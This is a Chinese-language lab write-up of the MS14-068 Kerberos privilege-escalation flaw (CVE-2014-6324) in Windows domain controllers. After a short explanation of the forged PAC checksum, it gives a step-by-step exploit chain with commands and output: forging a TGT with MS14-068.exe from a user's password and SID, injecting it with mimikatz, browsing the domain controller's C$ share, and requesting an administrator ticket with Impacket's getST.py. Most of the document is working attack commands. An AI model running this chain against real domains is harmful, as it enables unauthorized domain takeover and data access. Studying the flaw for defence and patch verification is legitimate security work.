一、漏洞背景
提权漏洞,CVE-2014-6324
二、漏洞原理
因为KDC无法正确的检查ST中PAC的有效签名。
PAC有两个数字签名:一个是使用服务的Hash进行签名;另一个是krbtgt的Hash进行签名。设计初衷是使用HMAC系列的checksum算法,需要用到key,该key是krbtgt的Hash和服务的Hash。
而实际签名的时候允许使用所有的checksum算法,包括MD5,因此就不需要key的参与了,这意味着可以任意伪造PAC的内容,然后在MD5生成一个服务检验就可以通过KDC的检验
三、漏洞复现
域控:Win2008 10.10.4.24
主机:Win2008 10.10.4.25
域用户:sec1.local\hack
1、MS14-068 权限提升
# 查看当前用户SID
C:\>whoami /user
USER INFORMATION
----------------
User Name SID
========= =============================================
sec1\hack S-1-5-21-275840881-3236154311-2410272474-1103
# 漏洞利用
C:\Users\hack\Desktop>MS14-068.exe -u hack@sec1.local -p Az123456@ -s S-1-5-21-2
75840881-3236154311-2410272474-1103 -d 10.10.4.24
Access is denied.
C:\Users\hack\Desktop>MS14-068.exe -u hack@sec1.local -p Az123456@ -s S-1-5-21-2
75840881-3236154311-2410272474-1103 -d 10.10.4.24
[+] Building AS-REQ for 10.10.4.24... Done!
[+] Sending AS-REQ to 10.10.4.24... Done!
[+] Receiving AS-REP from 10.10.4.24... Done!
[+] Parsing AS-REP from 10.10.4.24... Done!
[+] Building TGS-REQ for 10.10.4.24... Done!
[+] Sending TGS-REQ to 10.10.4.24... Done!
[+] Receiving TGS-REP from 10.10.4.24... Done!
[+] Parsing TGS-REP from 10.10.4.24... Done!
[+] Creating ccache file 'TGT_hack@sec1.local.ccache'... Done!
C:\Users\hack\Desktop>
# mimikatz导入
mimikatz # kerberos::ptc C:\Users\hack\Desktop\x64\TGT_hack@sec1.local.ccache
Principal : (01) : hack ; @ SEC1.LOCAL
Data 0
Start/End/MaxRenew: 6/2/2025 5:26:52 AM ; 6/2/2025 3:26:52 PM ; 6/9/2
025 5:26:52 AM
Service Name (01) : krbtgt ; SEC1.LOCAL ; @ SEC1.LOCAL
Target Name (01) : krbtgt ; SEC1.LOCAL ; @ SEC1.LOCAL
Client Name (01) : hack ; @ SEC1.LOCAL
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable
;
Session Key : 0x00000017 - rc4_hmac_nt
6b2083759a56c77d0866071e8d1d5a27
Ticket : 0x00000000 - null ; kvno = 2
[...]
* Injecting ticket : OK
mimikatz #
C:\Users\hack\Desktop>dir \\WIN-PJM2A2QKVCR.sec1.local\C$
Volume in drive \\WIN-PJM2A2QKVCR.sec1.local\C$ has no label.
Volume Serial Number is F4C0-CFB1
Directory of \\WIN-PJM2A2QKVCR.sec1.local\C$
06/02/2025 05:22 AM 1,206,166 mimikatz_trunk.zip
07/13/2009 08:20 PM <DIR> PerfLogs
04/07/2025 12:21 AM <DIR> Program Files
07/13/2009 10:06 PM <DIR> Program Files (x86)
06/02/2025 03:58 AM <DIR> Users
06/02/2025 05:22 AM <DIR> Windows
1 File(s) 1,206,166 bytes
5 Dir(s) 202,960,355,328 bytes free
C:\Users\hack\Desktop>dir \\WIN-PJM2A2QKVCR.sec1.local\C$
转到Kali中验证
# 导入票据
(base) ┌──(root㉿Kali)-[~]
└─# KRB5CCNAME=TGT_hack@sec1.local.ccache
# 获取ST
(base) ┌──(root㉿Kali)-[~]
└─# getST.py -dc-ip 10.10.4.24 sec1.local/administrator -spn CIFS/WIN-PJM2A2QKVCR.sec1.local -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting ST for user
[*] Saving ticket in administrator@CIFS_WIN-PJM2A2QKVCR.sec1.local@SEC1.LOCAL.ccache
(base) ┌──(root㉿Kali)-[~]
└─# KRB5CCNAME=administrator@CIFS_WIN-PJM2A2QKVCR.sec1.local@SEC1.LOCAL.ccache